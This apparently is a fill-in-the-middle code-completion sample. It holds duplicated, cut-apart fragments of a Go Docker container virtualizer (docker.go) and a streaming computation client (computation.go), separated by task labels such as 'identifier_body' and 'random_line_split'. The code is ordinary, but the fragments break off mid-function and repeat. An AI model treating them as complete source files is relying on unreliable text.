}
networkConfig = &network.NetworkingConfig{}
if bridge != "" {
config.MacAddress = d.cfg.VnicMAC
hostConfig.NetworkMode = container.NetworkMode(bridge)
networkConfig.EndpointsConfig = map[string]*network.EndpointSettings{
bridge: {
IPAMConfig: &network.EndpointIPAMConfig{
IPv4Address: d.cfg.VnicIP,
},
},
}
}
return
}
func (d *docker) umountVolumes(vols []volumeConfig) {
for _, vol := range vols {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err := d.mount.Unmount(vd, 0); err != nil {
glog.Warningf("Unable to unmount %s: %v", vd, err)
continue
}
glog.Infof("%s successfully unmounted", vol.UUID)
}
}
func (d *docker) unmapVolumes() {
for _, vol := range d.cfg.Volumes {
if err := d.storageDriver.UnmapVolumeFromNode(vol.UUID); err != nil {
glog.Warningf("Unable to unmap %s: %v", vol.UUID, err)
continue
}
glog.Infof("Unmapping volume %s", vol.UUID)
}
}
func (d *docker) mapAndMountVolumes() error {
for mapped, vol := range d.cfg.Volumes {
var devName string
var err error
if devName, err = d.storageDriver.MapVolumeToNode(vol.UUID); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to map (%s) %v", vol.UUID, err)
}
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = d.mount.Mount(devName, vd); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to mount (%s) %v", vol.UUID, err)
}
}
return nil
}
func (d *docker) prepareVolumes() ([]string, error) {
var err error
volumes := make([]string, len(d.cfg.Volumes))
for _, vol := range d.cfg.Volumes {
if vol.Bootable {
return nil, fmt.Errorf("Cannot attach bootable volumes to containers")
}
}
for i, vol := range d.cfg.Volumes {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = os.MkdirAll(vd, 0777); err != nil {
return nil, fmt.Errorf("Unable to create instances directory (%s) %v",
instancesDir, err)
}
volumes[i] = fmt.Sprintf("%s:/volumes/%s", vd, vol.UUID)
}
return volumes, nil
}
func (d *docker) createImage(bridge string, userData, metaData []byte) error {
err := d.initDockerClient()
if err != nil {
return err
}
volumes, err := d.prepareVolumes()
if err != nil {
glog.Errorf("Unable to mount container volumes %v", err)
return err
}
config, hostConfig, networkConfig := d.createConfigs(bridge, userData, metaData, volumes)
resp, err := d.cli.ContainerCreate(context.Background(), config, hostConfig, networkConfig,
d.cfg.Instance)
if err != nil {
glog.Errorf("Unable to create container %v", err)
return err
}
idPath := path.Join(d.instanceDir, "docker-id")
err = ioutil.WriteFile(idPath, []byte(resp.ID), 0600)
if err != nil {
glog.Errorf("Unable to store docker container ID %v", err)
_ = dockerDeleteContainer(d.cli, resp.ID, d.cfg.Instance)
return err
}
d.dockerID = resp.ID
// This value is configurable. Need to figure out how to get it from docker.
d.cfg.Disk = 10000
return nil
}
func dockerDeleteContainer(cli containerManager, dockerID, instanceUUID string) error {
err := cli.ContainerRemove(context.Background(),
types.ContainerRemoveOptions{
ContainerID: dockerID,
Force: true})
if err != nil {
glog.Warningf("Unable to delete docker instance %s:%s err %v",
instanceUUID, dockerID, err)
}
return err
}
func (d *docker) deleteImage() error {
if d.dockerID == "" {
return nil
}
err := d.initDockerClient()
if err != nil {
return err
}
return dockerDeleteContainer(d.cli, d.dockerID, d.cfg.Instance)
}
func (d *docker) startVM(vnicName, ipAddress, cephID string) error {
err := d.initDockerClient()
if err != nil {
return err
}
err = d.mapAndMountVolumes()
if err != nil {
glog.Errorf("Unable to map container volumes: %v", err)
return err
}
err = d.cli.ContainerStart(context.Background(), d.dockerID)
if err != nil {
d.umountVolumes(d.cfg.Volumes)
d.unmapVolumes()
glog.Errorf("Unable to start container %v", err)
return err
}
return nil
}
func dockerCommandLoop(cli containerManager, dockerChannel chan interface{}, instance, dockerID string) {
ctx, cancelFunc := context.WithCancel(context.Background())
lostContainerCh := make(chan struct{})
go func() {
defer close(lostContainerCh)
ret, err := cli.ContainerWait(ctx, dockerID)
glog.Infof("Instance %s:%s exitted with code %d err %v",
instance, dockerID, ret, err)
}()
DONE:
for {
select {
case _, _ = <-lostContainerCh:
break DONE
case cmd, ok := <-dockerChannel:
if !ok {
glog.Info("Cancelling Wait")
cancelFunc()
_ = <-lostContainerCh
break DONE
}
switch cmd := cmd.(type) {
case virtualizerStopCmd:
err := cli.ContainerKill(context.Background(), dockerID, "KILL")
if err != nil {
glog.Errorf("Unable to stop instance %s:%s: %v", instance, dockerID, err)
}
case virtualizerAttachCmd:
err := fmt.Errorf("Live Attach of volumes not supported for containers")
cmd.responseCh <- err
case virtualizerDetachCmd:
err := fmt.Errorf("Live Detach of volumes not supported for containers")
cmd.responseCh <- err
}
}
}
cancelFunc()
glog.Infof("Docker Instance %s:%s shut down", instance, dockerID)
}
func dockerConnect(cli containerManager, dockerChannel chan interface{}, instance,
dockerID string, closedCh chan struct{}, connectedCh chan struct{},
wg *sync.WaitGroup, boot bool) {
defer func() {
if closedCh != nil {
close(closedCh)
}
glog.Infof("Monitor function for %s exitting", instance)
wg.Done()
}()
// BUG(markus): Need a way to cancel this. Can't do this until we have contexts
con, err := cli.ContainerInspect(context.Background(), dockerID)
if err != nil {
glog.Errorf("Unable to determine status of instance %s:%s: %v", instance, dockerID, err)
return
}
if !con.State.Running && !con.State.Paused && !con.State.Restarting {
glog.Infof("Docker Instance %s:%s is not running", instance, dockerID)
return
}
close(connectedCh)
dockerCommandLoop(cli, dockerChannel, instance, dockerID)
}
func (d *docker) monitorVM(closedCh chan struct{}, connectedCh chan struct{},
wg *sync.WaitGroup, boot bool) chan interface{} {
if d.dockerID == "" {
idPath := path.Join(d.instanceDir, "docker-id")
data, err := ioutil.ReadFile(idPath)
if err != nil {
// We'll return an error later on in dockerConnect
glog.Errorf("Unable to read docker container ID %v", err)
} else {
d.dockerID = string(data)
glog.Infof("Instance UUID %s -> Docker UUID %s", d.cfg.Instance, d.dockerID)
}
}
dockerChannel := make(chan interface{})
wg.Add(1)
go dockerConnect(d.cli, dockerChannel, d.cfg.Instance, d.dockerID, closedCh, connectedCh, wg, boot)
return dockerChannel
}
func (d *docker) computeInstanceDiskspace() int {
if d.dockerID == "" {
return -1
}
err := d.initDockerClient()
if err != nil {
return -1
}
con, _, err := d.cli.ContainerInspectWithRaw(context.Background(), d.dockerID, true)
if err != nil {
glog.Errorf("Unable to determine status of instance %s:%s: %v", d.cfg.Instance,
d.dockerID, err)
return -1
}
if con.SizeRootFs == nil
|
{
return -1
}
|
conditional_block
|
|
docker.go
|
{
if d.cli != nil {
return nil
}
cli, err := getDockerClient()
if err != nil {
return fmt.Errorf("Unable to init docker client: %v", err)
}
d.cli = cli
return nil
}
func (d *docker) checkBackingImage() error {
glog.Infof("Checking backing docker image %s", d.cfg.DockerImage)
args := filters.NewArgs()
images, err := d.cli.ImageList(context.Background(),
types.ImageListOptions{
MatchName: d.cfg.DockerImage,
All: false,
Filters: args,
})
if err != nil {
glog.Infof("Called to ImageList for %s failed: %v", d.cfg.DockerImage, err)
return err
}
if len(images) == 0 {
glog.Infof("Docker Image not found %s", d.cfg.DockerImage)
return errImageNotFound
}
glog.Infof("Docker Image %s is present on node", d.cfg.DockerImage)
return nil
}
func (d *docker) ensureBackingImage() error {
glog.Infof("Downloading backing docker image %s", d.cfg.DockerImage)
err := d.initDockerClient()
if err != nil {
return err
}
err = d.checkBackingImage()
if err == nil {
return nil
} else if err != errImageNotFound {
glog.Errorf("Backing image check failed")
return err
}
glog.Infof("Backing image not found. Trying to download")
prog, err := d.cli.ImagePull(context.Background(), types.ImagePullOptions{ImageID: d.cfg.DockerImage}, nil)
if err != nil {
glog.Errorf("Unable to download image %s: %v\n", d.cfg.DockerImage, err)
return err
}
defer func() { _ = prog.Close() }()
dec := json.NewDecoder(prog)
var msg jsonmessage.JSONMessage
err = dec.Decode(&msg)
for err == nil {
if msg.Error != nil {
err = msg.Error
break
}
err = dec.Decode(&msg)
}
if err != nil && err != io.EOF {
glog.Errorf("Unable to download image : %v\n", err)
return err
}
return nil
}
func (d *docker) createConfigs(bridge string, userData, metaData []byte, volumes []string) (config *container.Config,
hostConfig *container.HostConfig, networkConfig *network.NetworkingConfig) {
var hostname string
var cmd []string
md := &struct {
Hostname string `json:"hostname"`
}{}
err := json.Unmarshal(metaData, md)
if err != nil {
glog.Info("Start command does not contain hostname. Setting to instance UUID")
hostname = d.cfg.Instance
} else {
glog.Infof("Found hostname %s", md.Hostname)
hostname = md.Hostname
}
ud := &struct {
Cmds [][]string `yaml:"runcmd"`
}{}
err = yaml.Unmarshal(userData, ud)
if err != nil {
glog.Info("Start command does not contain a run command")
} else {
if len(ud.Cmds) >= 1 {
cmd = ud.Cmds[0]
if len(ud.Cmds) > 1 {
glog.Warningf("Only one command supported. Found %d in userdata", len(ud.Cmds))
}
}
}
config = &container.Config{
Hostname: hostname,
Image: d.cfg.DockerImage,
Cmd: cmd,
}
hostConfig = &container.HostConfig{Binds: volumes}
if d.cfg.Mem > 0 {
// Docker memory limit is in bytes.
hostConfig.Memory = int64(1024 * 1024 * d.cfg.Mem)
}
if d.cfg.Cpus > 0 {
// CFS quota period - default to 100ms.
hostConfig.CPUPeriod = 100 * 1000
hostConfig.CPUQuota = hostConfig.CPUPeriod * int64(d.cfg.Cpus)
}
networkConfig = &network.NetworkingConfig{}
if bridge != "" {
config.MacAddress = d.cfg.VnicMAC
hostConfig.NetworkMode = container.NetworkMode(bridge)
networkConfig.EndpointsConfig = map[string]*network.EndpointSettings{
bridge: {
IPAMConfig: &network.EndpointIPAMConfig{
IPv4Address: d.cfg.VnicIP,
},
},
}
}
return
}
func (d *docker) umountVolumes(vols []volumeConfig) {
for _, vol := range vols {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err := d.mount.Unmount(vd, 0); err != nil {
glog.Warningf("Unable to unmount %s: %v", vd, err)
continue
}
glog.Infof("%s successfully unmounted", vol.UUID)
}
}
func (d *docker) unmapVolumes() {
for _, vol := range d.cfg.Volumes {
if err := d.storageDriver.UnmapVolumeFromNode(vol.UUID); err != nil {
glog.Warningf("Unable to unmap %s: %v", vol.UUID, err)
continue
}
glog.Infof("Unmapping volume %s", vol.UUID)
}
}
func (d *docker) mapAndMountVolumes() error {
for mapped, vol := range d.cfg.Volumes {
var devName string
var err error
if devName, err = d.storageDriver.MapVolumeToNode(vol.UUID); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to map (%s) %v", vol.UUID, err)
}
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = d.mount.Mount(devName, vd); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to mount (%s) %v", vol.UUID, err)
}
}
return nil
}
func (d *docker) prepareVolumes() ([]string, error) {
var err error
volumes := make([]string, len(d.cfg.Volumes))
for _, vol := range d.cfg.Volumes {
if vol.Bootable {
return nil, fmt.Errorf("Cannot attach bootable volumes to containers")
}
}
for i, vol := range d.cfg.Volumes {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = os.MkdirAll(vd, 0777); err != nil {
return nil, fmt.Errorf("Unable to create instances directory (%s) %v",
instancesDir, err)
}
volumes[i] = fmt.Sprintf("%s:/volumes/%s", vd, vol.UUID)
}
return volumes, nil
}
func (d *docker) createImage(bridge string, userData, metaData []byte) error
|
idPath := path.Join(d.instanceDir, "docker-id")
err = ioutil.WriteFile(idPath, []byte(resp.ID), 0600)
if err != nil {
glog.Errorf("Unable to store docker container ID %v", err)
_ = dockerDeleteContainer(d.cli, resp.ID, d.cfg.Instance)
return err
}
d.dockerID = resp.ID
// This value is configurable. Need to figure out how to get it from docker.
d.cfg.Disk = 10000
return nil
}
func dockerDeleteContainer(cli containerManager, dockerID, instanceUUID string) error {
err := cli.ContainerRemove(context.Background(),
types.ContainerRemoveOptions{
ContainerID: dockerID,
Force: true})
if err != nil {
glog.Warningf("Unable to delete docker instance %s:%s err %v",
instanceUUID, dockerID, err)
}
return err
}
func (d *docker) deleteImage() error {
if d.dockerID == "" {
return nil
}
err := d.initDockerClient()
if err != nil {
return err
}
return dockerDeleteContainer(d.cli, d.dockerID, d.cfg.Instance)
}
func (d *docker) startVM(vnicName, ipAddress, cephID string) error {
err := d.initDockerClient()
if err != nil {
return err
}
err = d.mapAndMountVolumes()
if err != nil {
glog.Errorf("Unable to map container volumes: %v", err)
return err
}
err = d.cli.ContainerStart(context.Background(), d.dockerID)
if err != nil {
d.umountVolumes(d.cfg.Volumes)
d.unmapVolumes()
glog.Errorf("Unable to start container %v", err)
return err
}
return nil
|
{
err := d.initDockerClient()
if err != nil {
return err
}
volumes, err := d.prepareVolumes()
if err != nil {
glog.Errorf("Unable to mount container volumes %v", err)
return err
}
config, hostConfig, networkConfig := d.createConfigs(bridge, userData, metaData, volumes)
resp, err := d.cli.ContainerCreate(context.Background(), config, hostConfig, networkConfig,
d.cfg.Instance)
if err != nil {
glog.Errorf("Unable to create container %v", err)
return err
}
|
identifier_body
|
docker.go
|
cmd []string
md := &struct {
Hostname string `json:"hostname"`
}{}
err := json.Unmarshal(metaData, md)
if err != nil {
glog.Info("Start command does not contain hostname. Setting to instance UUID")
hostname = d.cfg.Instance
} else {
glog.Infof("Found hostname %s", md.Hostname)
hostname = md.Hostname
}
ud := &struct {
Cmds [][]string `yaml:"runcmd"`
}{}
err = yaml.Unmarshal(userData, ud)
if err != nil {
glog.Info("Start command does not contain a run command")
} else {
if len(ud.Cmds) >= 1 {
cmd = ud.Cmds[0]
if len(ud.Cmds) > 1 {
glog.Warningf("Only one command supported. Found %d in userdata", len(ud.Cmds))
}
}
}
config = &container.Config{
Hostname: hostname,
Image: d.cfg.DockerImage,
Cmd: cmd,
}
hostConfig = &container.HostConfig{Binds: volumes}
if d.cfg.Mem > 0 {
// Docker memory limit is in bytes.
hostConfig.Memory = int64(1024 * 1024 * d.cfg.Mem)
}
if d.cfg.Cpus > 0 {
// CFS quota period - default to 100ms.
hostConfig.CPUPeriod = 100 * 1000
hostConfig.CPUQuota = hostConfig.CPUPeriod * int64(d.cfg.Cpus)
}
networkConfig = &network.NetworkingConfig{}
if bridge != "" {
config.MacAddress = d.cfg.VnicMAC
hostConfig.NetworkMode = container.NetworkMode(bridge)
networkConfig.EndpointsConfig = map[string]*network.EndpointSettings{
bridge: {
IPAMConfig: &network.EndpointIPAMConfig{
IPv4Address: d.cfg.VnicIP,
},
},
}
}
return
}
func (d *docker) umountVolumes(vols []volumeConfig) {
for _, vol := range vols {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err := d.mount.Unmount(vd, 0); err != nil {
glog.Warningf("Unable to unmount %s: %v", vd, err)
continue
}
glog.Infof("%s successfully unmounted", vol.UUID)
}
}
func (d *docker) unmapVolumes() {
for _, vol := range d.cfg.Volumes {
if err := d.storageDriver.UnmapVolumeFromNode(vol.UUID); err != nil {
glog.Warningf("Unable to unmap %s: %v", vol.UUID, err)
continue
}
glog.Infof("Unmapping volume %s", vol.UUID)
}
}
func (d *docker) mapAndMountVolumes() error {
for mapped, vol := range d.cfg.Volumes {
var devName string
var err error
if devName, err = d.storageDriver.MapVolumeToNode(vol.UUID); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to map (%s) %v", vol.UUID, err)
}
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = d.mount.Mount(devName, vd); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to mount (%s) %v", vol.UUID, err)
}
}
return nil
}
func (d *docker) prepareVolumes() ([]string, error) {
var err error
volumes := make([]string, len(d.cfg.Volumes))
for _, vol := range d.cfg.Volumes {
if vol.Bootable {
return nil, fmt.Errorf("Cannot attach bootable volumes to containers")
}
}
for i, vol := range d.cfg.Volumes {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = os.MkdirAll(vd, 0777); err != nil {
return nil, fmt.Errorf("Unable to create instances directory (%s) %v",
instancesDir, err)
}
volumes[i] = fmt.Sprintf("%s:/volumes/%s", vd, vol.UUID)
}
return volumes, nil
}
func (d *docker) createImage(bridge string, userData, metaData []byte) error {
err := d.initDockerClient()
if err != nil {
return err
}
volumes, err := d.prepareVolumes()
if err != nil {
glog.Errorf("Unable to mount container volumes %v", err)
return err
}
config, hostConfig, networkConfig := d.createConfigs(bridge, userData, metaData, volumes)
resp, err := d.cli.ContainerCreate(context.Background(), config, hostConfig, networkConfig,
d.cfg.Instance)
if err != nil {
glog.Errorf("Unable to create container %v", err)
return err
}
idPath := path.Join(d.instanceDir, "docker-id")
err = ioutil.WriteFile(idPath, []byte(resp.ID), 0600)
if err != nil {
glog.Errorf("Unable to store docker container ID %v", err)
_ = dockerDeleteContainer(d.cli, resp.ID, d.cfg.Instance)
return err
}
d.dockerID = resp.ID
// This value is configurable. Need to figure out how to get it from docker.
d.cfg.Disk = 10000
return nil
}
func dockerDeleteContainer(cli containerManager, dockerID, instanceUUID string) error {
err := cli.ContainerRemove(context.Background(),
types.ContainerRemoveOptions{
ContainerID: dockerID,
Force: true})
if err != nil {
glog.Warningf("Unable to delete docker instance %s:%s err %v",
instanceUUID, dockerID, err)
}
return err
}
func (d *docker) deleteImage() error {
if d.dockerID == "" {
return nil
}
err := d.initDockerClient()
if err != nil {
return err
}
return dockerDeleteContainer(d.cli, d.dockerID, d.cfg.Instance)
}
func (d *docker) startVM(vnicName, ipAddress, cephID string) error {
err := d.initDockerClient()
if err != nil {
return err
}
err = d.mapAndMountVolumes()
if err != nil {
glog.Errorf("Unable to map container volumes: %v", err)
return err
}
err = d.cli.ContainerStart(context.Background(), d.dockerID)
if err != nil {
d.umountVolumes(d.cfg.Volumes)
d.unmapVolumes()
glog.Errorf("Unable to start container %v", err)
return err
}
return nil
}
func dockerCommandLoop(cli containerManager, dockerChannel chan interface{}, instance, dockerID string) {
ctx, cancelFunc := context.WithCancel(context.Background())
lostContainerCh := make(chan struct{})
go func() {
defer close(lostContainerCh)
ret, err := cli.ContainerWait(ctx, dockerID)
glog.Infof("Instance %s:%s exitted with code %d err %v",
instance, dockerID, ret, err)
}()
DONE:
for {
select {
case _, _ = <-lostContainerCh:
break DONE
case cmd, ok := <-dockerChannel:
if !ok {
glog.Info("Cancelling Wait")
cancelFunc()
_ = <-lostContainerCh
break DONE
}
switch cmd := cmd.(type) {
case virtualizerStopCmd:
err := cli.ContainerKill(context.Background(), dockerID, "KILL")
if err != nil {
glog.Errorf("Unable to stop instance %s:%s: %v", instance, dockerID, err)
}
case virtualizerAttachCmd:
err := fmt.Errorf("Live Attach of volumes not supported for containers")
cmd.responseCh <- err
case virtualizerDetachCmd:
err := fmt.Errorf("Live Detach of volumes not supported for containers")
cmd.responseCh <- err
}
}
}
cancelFunc()
glog.Infof("Docker Instance %s:%s shut down", instance, dockerID)
}
func dockerConnect(cli containerManager, dockerChannel chan interface{}, instance,
dockerID string, closedCh chan struct{}, connectedCh chan struct{},
wg *sync.WaitGroup, boot bool) {
defer func() {
if closedCh != nil {
close(closedCh)
}
glog.Infof("Monitor function for %s exitting", instance)
wg.Done()
}()
// BUG(markus): Need a way to cancel this. Can't do this until we have contexts
con, err := cli.ContainerInspect(context.Background(), dockerID)
if err != nil {
glog.Errorf("Unable to determine status of instance %s:%s: %v", instance, dockerID, err)
return
}
if !con.State.Running && !con.State.Paused && !con.State.Restarting {
glog.Infof("Docker Instance %s:%s is not running", instance, dockerID)
return
}
close(connectedCh)
dockerCommandLoop(cli, dockerChannel, instance, dockerID)
}
func (d *docker)
|
monitorVM
|
identifier_name
|
|
computation.go
|
limitSize asyncMetadata[int]
matchedNoTimeseriesQuery asyncMetadata[string]
groupByMissingProperties asyncMetadata[[]string]
tsidMetadata map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]
}
// ComputationError exposes the underlying metadata of a computation error
type ComputationError struct {
Code int
Message string
ErrorType string
}
func (e *ComputationError) Error() string {
err := fmt.Sprintf("%v", e.Code)
if e.ErrorType != "" {
err = fmt.Sprintf("%v (%v)", e.Code, e.ErrorType)
|
}
return err
}
func newComputation(channel <-chan messages.Message, name string, client *Client) *Computation {
comp := &Computation{
channel: channel,
name: name,
client: client,
dataCh: make(chan *messages.DataMessage),
dataChBuffer: make(chan *messages.DataMessage),
eventCh: make(chan *messages.EventMessage),
eventChBuffer: make(chan *messages.EventMessage),
expirationCh: make(chan *messages.ExpiredTSIDMessage),
expirationChBuffer: make(chan *messages.ExpiredTSIDMessage),
tsidMetadata: make(map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]),
}
go bufferMessages(comp.dataChBuffer, comp.dataCh)
go bufferMessages(comp.expirationChBuffer, comp.expirationCh)
go bufferMessages(comp.eventChBuffer, comp.eventCh)
go func() {
err := comp.watchMessages()
if !errors.Is(err, errChannelClosed) {
comp.errMutex.Lock()
comp.lastError = err
comp.errMutex.Unlock()
}
comp.shutdown()
}()
return comp
}
// Handle of the computation. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Handle(ctx context.Context) (string, error) {
return c.handle.Get(ctx)
}
// Resolution of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Resolution(ctx context.Context) (time.Duration, error) {
resMS, err := c.resolutionMS.Get(ctx)
return time.Duration(resMS) * time.Millisecond, err
}
// Lag detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Lag(ctx context.Context) (time.Duration, error) {
lagMS, err := c.lagMS.Get(ctx)
return time.Duration(lagMS) * time.Millisecond, err
}
// MaxDelay detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MaxDelay(ctx context.Context) (time.Duration, error) {
maxDelayMS, err := c.maxDelayMS.Get(ctx)
return time.Duration(maxDelayMS) * time.Millisecond, err
}
// MatchedSize detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MatchedSize(ctx context.Context) (int, error) {
return c.matchedSize.Get(ctx)
}
// LimitSize detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) LimitSize(ctx context.Context) (int, error) {
return c.limitSize.Get(ctx)
}
// MatchedNoTimeseriesQuery if it matched no active timeseries. Will wait as long as the given ctx
// is not closed. If ctx is closed an error will be returned.
func (c *Computation) MatchedNoTimeseriesQuery(ctx context.Context) (string, error) {
return c.matchedNoTimeseriesQuery.Get(ctx)
}
// GroupByMissingProperties are timeseries that don't contain the required dimensions. Will wait as
// long as the given ctx is not closed. If ctx is closed an error will be returned.
func (c *Computation) GroupByMissingProperties(ctx context.Context) ([]string, error) {
return c.groupByMissingProperties.Get(ctx)
}
// TSIDMetadata for a particular tsid. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) TSIDMetadata(ctx context.Context, tsid idtool.ID) (*messages.MetadataProperties, error) {
c.Lock()
if _, ok := c.tsidMetadata[tsid]; !ok {
c.tsidMetadata[tsid] = &asyncMetadata[*messages.MetadataProperties]{}
}
md := c.tsidMetadata[tsid]
c.Unlock()
return md.Get(ctx)
}
// Err returns the last fatal error that caused the computation to stop, if
// any. Will be nil if the computation stopped in an expected manner.
func (c *Computation) Err() error {
c.errMutex.RLock()
defer c.errMutex.RUnlock()
return c.lastError
}
func (c *Computation) watchMessages() error {
for {
m, ok := <-c.channel
if !ok {
return nil
}
if err := c.processMessage(m); err != nil {
return err
}
}
}
var errChannelClosed = errors.New("computation channel is closed")
func (c *Computation) processMessage(m messages.Message) error {
switch v := m.(type) {
case *messages.JobStartControlMessage:
c.handle.Set(v.Handle)
case *messages.EndOfChannelControlMessage, *messages.ChannelAbortControlMessage:
return errChannelClosed
case *messages.DataMessage:
c.dataChBuffer <- v
case *messages.ExpiredTSIDMessage:
c.Lock()
delete(c.tsidMetadata, idtool.IDFromString(v.TSID))
c.Unlock()
c.expirationChBuffer <- v
case *messages.InfoMessage:
switch v.MessageBlock.Code {
case messages.JobRunningResolution:
c.resolutionMS.Set(v.MessageBlock.Contents.(messages.JobRunningResolutionContents).ResolutionMS())
case messages.JobDetectedLag:
c.lagMS.Set(v.MessageBlock.Contents.(messages.JobDetectedLagContents).LagMS())
case messages.JobInitialMaxDelay:
c.maxDelayMS.Set(v.MessageBlock.Contents.(messages.JobInitialMaxDelayContents).MaxDelayMS())
case messages.FindLimitedResultSet:
c.matchedSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).MatchedSize())
c.limitSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).LimitSize())
case messages.FindMatchedNoTimeseries:
c.matchedNoTimeseriesQuery.Set(v.MessageBlock.Contents.(messages.FindMatchedNoTimeseriesContents).MatchedNoTimeseriesQuery())
case messages.GroupByMissingProperty:
c.groupByMissingProperties.Set(v.MessageBlock.Contents.(messages.GroupByMissingPropertyContents).GroupByMissingProperties())
}
case *messages.ErrorMessage:
rawData := v.RawData()
computationError := ComputationError{}
if code, ok := rawData["error"]; ok {
computationError.Code = int(code.(float64))
}
if msg, ok := rawData["message"]; ok && msg != nil {
computationError.Message = msg.(string)
}
if errType, ok := rawData["errorType"]; ok {
computationError.ErrorType = errType.(string)
}
return &computationError
case *messages.MetadataMessage:
c.Lock()
if _, ok := c.tsidMetadata[v.TSID]; !ok {
c.tsidMetadata[v.TSID] = &asyncMetadata[*messages.MetadataProperties]{}
}
c.tsidMetadata[v.TSID].Set(&v.Properties)
c.Unlock()
case *messages.EventMessage:
c.eventChBuffer <- v
}
return nil
}
func bufferMessages[T any](in chan *T, out chan *T) {
buffer := make([]*T, 0)
var nextMessage *T
defer func() {
if nextMessage != nil {
out <- nextMessage
}
for i := range buffer {
out <- buffer[i]
}
close(out)
}()
for {
if len(buffer) > 0 {
if nextMessage == nil {
nextMessage, buffer = buffer[0], buffer[1:]
}
select {
case out <- nextMessage:
nextMessage = nil
case msg, ok := <-in:
if !ok {
return
}
buffer = append(buffer, msg)
}
} else {
msg, ok := <-in
if !ok {
return
}
buffer = append(buffer, msg)
}
}
}
// Data returns the channel on which data messages come. This channel will be closed when the
// computation is finished. To prevent goroutine leaks, you should read all messages from this
// channel until it is closed.
func (c *Computation) Data() <-chan *messages.DataMessage {
return c.dataCh
}
// Expirations returns a channel that will be sent messages about expired TSIDs, i.e. time series
// that are no longer valid for this computation. This channel will be
|
}
if e.Message != "" {
err = fmt.Sprintf("%v: %v", err, e.Message)
|
random_line_split
|
computation.go
|
limitSize asyncMetadata[int]
matchedNoTimeseriesQuery asyncMetadata[string]
groupByMissingProperties asyncMetadata[[]string]
tsidMetadata map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]
}
// ComputationError exposes the underlying metadata of a computation error
type ComputationError struct {
Code int
Message string
ErrorType string
}
func (e *ComputationError) Error() string {
err := fmt.Sprintf("%v", e.Code)
if e.ErrorType != "" {
err = fmt.Sprintf("%v (%v)", e.Code, e.ErrorType)
}
if e.Message != "" {
err = fmt.Sprintf("%v: %v", err, e.Message)
}
return err
}
func newComputation(channel <-chan messages.Message, name string, client *Client) *Computation {
comp := &Computation{
channel: channel,
name: name,
client: client,
dataCh: make(chan *messages.DataMessage),
dataChBuffer: make(chan *messages.DataMessage),
eventCh: make(chan *messages.EventMessage),
eventChBuffer: make(chan *messages.EventMessage),
expirationCh: make(chan *messages.ExpiredTSIDMessage),
expirationChBuffer: make(chan *messages.ExpiredTSIDMessage),
tsidMetadata: make(map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]),
}
go bufferMessages(comp.dataChBuffer, comp.dataCh)
go bufferMessages(comp.expirationChBuffer, comp.expirationCh)
go bufferMessages(comp.eventChBuffer, comp.eventCh)
go func() {
err := comp.watchMessages()
if !errors.Is(err, errChannelClosed) {
comp.errMutex.Lock()
comp.lastError = err
comp.errMutex.Unlock()
}
comp.shutdown()
}()
return comp
}
// Handle of the computation. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Handle(ctx context.Context) (string, error) {
return c.handle.Get(ctx)
}
// Resolution of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Resolution(ctx context.Context) (time.Duration, error) {
resMS, err := c.resolutionMS.Get(ctx)
return time.Duration(resMS) * time.Millisecond, err
}
// Lag detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Lag(ctx context.Context) (time.Duration, error) {
lagMS, err := c.lagMS.Get(ctx)
return time.Duration(lagMS) * time.Millisecond, err
}
// MaxDelay detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MaxDelay(ctx context.Context) (time.Duration, error) {
maxDelayMS, err := c.maxDelayMS.Get(ctx)
return time.Duration(maxDelayMS) * time.Millisecond, err
}
// MatchedSize detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MatchedSize(ctx context.Context) (int, error) {
return c.matchedSize.Get(ctx)
}
// LimitSize detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) LimitSize(ctx context.Context) (int, error) {
return c.limitSize.Get(ctx)
}
// MatchedNoTimeseriesQuery if it matched no active timeseries. Will wait as long as the given ctx
// is not closed. If ctx is closed an error will be returned.
func (c *Computation) MatchedNoTimeseriesQuery(ctx context.Context) (string, error) {
return c.matchedNoTimeseriesQuery.Get(ctx)
}
// GroupByMissingProperties are timeseries that don't contain the required dimensions. Will wait as
// long as the given ctx is not closed. If ctx is closed an error will be returned.
func (c *Computation) GroupByMissingProperties(ctx context.Context) ([]string, error) {
return c.groupByMissingProperties.Get(ctx)
}
